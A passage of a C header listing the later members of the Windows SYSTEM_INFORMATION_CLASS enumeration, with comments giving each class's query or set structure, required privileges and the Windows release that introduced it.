183 |     SystemManufacturingInformation,                         // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD
184 |     SystemEnergyEstimationConfigInformation,                // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION
185 |     SystemHypervisorDetailInformation,                      // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION
186 |     SystemProcessorCycleStatsInformation,                   // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx // 160
187 |     SystemVmGenerationCountInformation,                     // s: 
188 |     SystemTrustedPlatformModuleInformation,                 // q: SYSTEM_TPM_INFORMATION
189 |     SystemKernelDebuggerFlags,                              // q: SYSTEM_KERNEL_DEBUGGER_FLAGS
190 |     SystemCodeIntegrityPolicyInformation,                   // qs: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION
191 |     SystemIsolatedUserModeInformation,                      // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION
192 |     SystemHardwareSecurityTestInterfaceResultsInformation,  // q: 
193 |     SystemSingleModuleInformation,                          // q: SYSTEM_SINGLE_MODULE_INFORMATION
194 |     SystemAllowedCpuSetsInformation,                        // s: SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION
195 |     SystemVsmProtectionInformation,                         // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation)
196 |     SystemInterruptCpuSetsInformation,                      // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170
197 |     SystemSecureBootPolicyFullInformation,                  // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION
198 |     SystemCodeIntegrityPolicyFullInformation,               // q: 
199 |     SystemAffinitizedInterruptProcessorInformation,         // q: KAFFINITY_EX // (requires SeIncreaseBasePriorityPrivilege)
200 |     SystemRootSiloInformation,                              // q: SYSTEM_ROOT_SILO_INFORMATION
201 |     SystemCpuSetInformation,                                // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2
202 |     SystemCpuSetTagInformation,                             // q: SYSTEM_CPU_SET_TAG_INFORMATION
203 |     SystemWin32WerStartCallout,                             // s: 
204 |     SystemSecureKernelProfileInformation,                   // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION
205 |     SystemCodeIntegrityPlatformManifestInformation,         // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // NtQuerySystemInformationEx // since REDSTONE
206 |     SystemInterruptSteeringInformation,                     // q: in: SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT, out: SYSTEM_INTERRUPT_STEERING_INFORMATION_OUTPUT // NtQuerySystemInformationEx
207 |     SystemSupportedProcessorArchitectures,                  // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 180
208 |     SystemMemoryUsageInformation,                           // q: SYSTEM_MEMORY_USAGE_INFORMATION
209 |     SystemCodeIntegrityCertificateInformation,              // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION
210 |     SystemPhysicalMemoryInformation,                        // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2
211 |     SystemControlFlowTransition,                            // qs: (Warbird/Encrypt/Decrypt/Execute)
212 |     SystemKernelDebuggingAllowed,                           // s: ULONG
213 |     SystemActivityModerationExeState,                       // s: SYSTEM_ACTIVITY_MODERATION_EXE_STATE
214 |     SystemActivityModerationUserSettings,                   // q: SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS
215 |     SystemCodeIntegrityPoliciesFullInformation,             // qs: NtQuerySystemInformationEx
216 |     SystemCodeIntegrityUnlockInformation,                   // q: SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190
217 |     SystemIntegrityQuotaInformation,                        // s: SYSTEM_INTEGRITY_QUOTA_INFORMATION (requires SeDebugPrivilege)
218 |     SystemFlushInformation,                                 // q: SYSTEM_FLUSH_INFORMATION
219 |     SystemProcessorIdleMaskInformation,                     // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3
220 |     SystemSecureDumpEncryptionInformation,                  // qs: NtQuerySystemInformationEx // (q: requires SeDebugPrivilege) (s: requires SeTcbPrivilege)
221 |     SystemWriteConstraintInformation,                       // q: SYSTEM_WRITE_CONSTRAINT_INFORMATION
222 |     SystemKernelVaShadowInformation,                        // q: SYSTEM_KERNEL_VA_SHADOW_INFORMATION
223 |     SystemHypervisorSharedPageInformation,                  // q: SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4
224 |     SystemFirmwareBootPerformanceInformation,               // q: 
225 |     SystemCodeIntegrityVerificationInformation,             // q: SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION
226 |     SystemFirmwarePartitionInformation,                     // q: SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200
227 |     SystemSpeculationControlInformation,                    // q: SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above.
228 |     SystemDmaGuardPolicyInformation,                        // q: SYSTEM_DMA_GUARD_POLICY_INFORMATION
229 |     SystemEnclaveLaunchControlInformation,                  // q: SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION
230 |     SystemWorkloadAllowedCpuSetsInformation,                // q: SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5
231 |     SystemCodeIntegrityUnlockModeInformation,               // q: SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION
232 |     SystemLeapSecondInformation,                            // qs: SYSTEM_LEAP_SECOND_INFORMATION // (s: requires SeSystemtimePrivilege)
233 |     SystemFlags2Information,                                // q: SYSTEM_FLAGS_INFORMATION // (s: requires SeDebugPrivilege)
234 |     SystemSecurityModelInformation,                         // q: SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1
235 |     SystemCodeIntegritySyntheticCacheInformation,           // qs: NtQuerySystemInformationEx
236 |     SystemFeatureConfigurationInformation,                  // q: in: SYSTEM_FEATURE_CONFIGURATION_QUERY, out: SYSTEM_FEATURE_CONFIGURATION_INFORMATION; s: SYSTEM_FEATURE_CONFIGURATION_UPDATE // NtQuerySystemInformationEx // since 20H1 // 210
237 |     SystemFeatureConfigurationSectionInformation,           // q: in: SYSTEM_FEATURE_CONFIGURATION_SECTIONS_REQUEST, out: SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION // NtQuerySystemInformationEx
238 |     SystemFeatureUsageSubscriptionInformation,              // q: SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS; s: SYSTEM_FEATURE_USAGE_SUBSCRIPTION_UPDATE
239 |     SystemSecureSpeculationControlInformation,              // q: SECURE_SPECULATION_CONTROL_INFORMATION
240 |     SystemSpacesBootInformation,                            // qs: // since 20H2
241 |     SystemFwRamdiskInformation,                             // q: SYSTEM_FIRMWARE_RAMDISK_INFORMATION
242 |     SystemWheaIpmiHardwareInformation,                      // q: 
243 |     SystemDifSetRuleClassInformation,                       // s: SYSTEM_DIF_VOLATILE_INFORMATION (requires SeDebugPrivilege)
244 |     SystemDifClearRuleClassInformation,                     // s: NULL (requires SeDebugPrivilege)
245 |     SystemDifApplyPluginVerificationOnDriver,               // q: SYSTEM_DIF_PLUGIN_DRIVER_INFORMATION (requires SeDebugPrivilege)
246 |     SystemDifRemovePluginVerificationOnDriver,              // q: SYSTEM_DIF_PLUGIN_DRIVER_INFORMATION (requires SeDebugPrivilege) // 220
247 |     SystemShadowStackInformation,                           // q: SYSTEM_SHADOW_STACK_INFORMATION
248 |     SystemBuildVersionInformation,                          // q: in: ULONG (LayerNumber), out: SYSTEM_BUILD_VERSION_INFORMATION // NtQuerySystemInformationEx
249 |     SystemPoolLimitInformation,                             // q: SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege) // NtQuerySystemInformationEx
250 |     SystemCodeIntegrityAddDynamicStore,                     // q: CodeIntegrity-AllowConfigurablePolicy-CustomKernelSigners
251 |     SystemCodeIntegrityClearDynamicStores,                  // q: CodeIntegrity-AllowConfigurablePolicy-CustomKernelSigners
252 |     SystemDifPoolTrackingInformation,                       // s: SYSTEM_DIF_POOL_TRACKING_INFORMATION (requires SeDebugPrivilege)
253 |     SystemPoolZeroingInformation,                           // q: SYSTEM_POOL_ZEROING_INFORMATION
254 |     SystemDpcWatchdogInformation,                           // qs: SYSTEM_DPC_WATCHDOG_CONFIGURATION_INFORMATION
255 |     SystemDpcWatchdogInformation2,                          // qs: SYSTEM_DPC_WATCHDOG_CONFIGURATION_INFORMATION_V2
256 |     SystemSupportedProcessorArchitectures2,                 // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 230
257 |     SystemSingleProcessorRelationshipInformation,           // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor) // NtQuerySystemInformationEx
258 |     SystemXfgCheckFailureInformation,                       // q: SYSTEM_XFG_FAILURE_INFORMATION
259 |     SystemIommuStateInformation,                            // q: SYSTEM_IOMMU_STATE_INFORMATION // since 22H1
260 |     SystemHypervisorMinrootInformation,                     // q: SYSTEM_HYPERVISOR_MINROOT_INFORMATION
261 |     SystemHypervisorBootPagesInformation,                   // q: SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION
262 |     SystemPointerAuthInformation,                           // q: SYSTEM_POINTER_AUTH_INFORMATION
263 |     SystemSecureKernelDebuggerInformation,                  // qs: NtQuerySystemInformationEx
264 |     SystemOriginalImageFeatureInformation,                  // q: in: SYSTEM_ORIGINAL_IMAGE_FEATURE_INFORMATION_INPUT, out: SYSTEM_ORIGINAL_IMAGE_FEATURE_INFORMATION_OUTPUT // NtQuerySystemInformationEx
265 |     SystemMemoryNumaInformation,                            // q: SYSTEM_MEMORY_NUMA_INFORMATION_INPUT, SYSTEM_MEMORY_NUMA_INFORMATION_OUTPUT // NtQuerySystemInformationEx
266 |     SystemMemoryNumaPerformanceInformation,                 // q: SYSTEM_MEMORY_NUMA_PERFORMANCE_INFORMATION_INPUTSYSTEM_MEMORY_NUMA_PERFORMANCE_INFORMATION_INPUT, SYSTEM_MEMORY_NUMA_PERFORMANCE_INFORMATION_OUTPUT // since 24H2 // 240
267 |     SystemCodeIntegritySignedPoliciesFullInformation,       // qs: NtQuerySystemInformationEx
268 |     SystemSecureCoreInformation,                            // qs: SystemSecureSecretsInformation
269 |     SystemTrustedAppsRuntimeInformation,                    // q: SYSTEM_TRUSTEDAPPS_RUNTIME_INFORMATION
270 |     SystemBadPageInformationEx,                             // q: SYSTEM_BAD_PAGE_INFORMATION
271 |     SystemResourceDeadlockTimeout,                          // q: ULONG
272 |     SystemBreakOnContextUnwindFailureInformation,           // q: ULONG (requires SeDebugPrivilege)
273 |     SystemOslRamdiskInformation,                            // q: SYSTEM_OSL_RAMDISK_INFORMATION
274 |     SystemCodeIntegrityPolicyManagementInformation,         // q: SYSTEM_CODEINTEGRITYPOLICY_MANAGEMENT // since 25H2
275 |     SystemMemoryNumaCacheInformation,                       // q: 
276 |     SystemProcessorFeaturesBitMapInformation,               // q: // 250
277 |     SystemRefTraceInformationEx,                            // q: SYSTEM_REF_TRACE_INFORMATION_EX
278 |     SystemBasicProcessInformation,                          // q: SYSTEM_BASICPROCESS_INFORMATION
279 |     SystemHandleCountInformation,                           // q: SYSTEM_HANDLECOUNT_INFORMATION
280 |     MaxSystemInfoClass
281 | } SYSTEM_INFORMATION_CLASS;
282 | 
283 | 


--------------------------------------------------------------------------------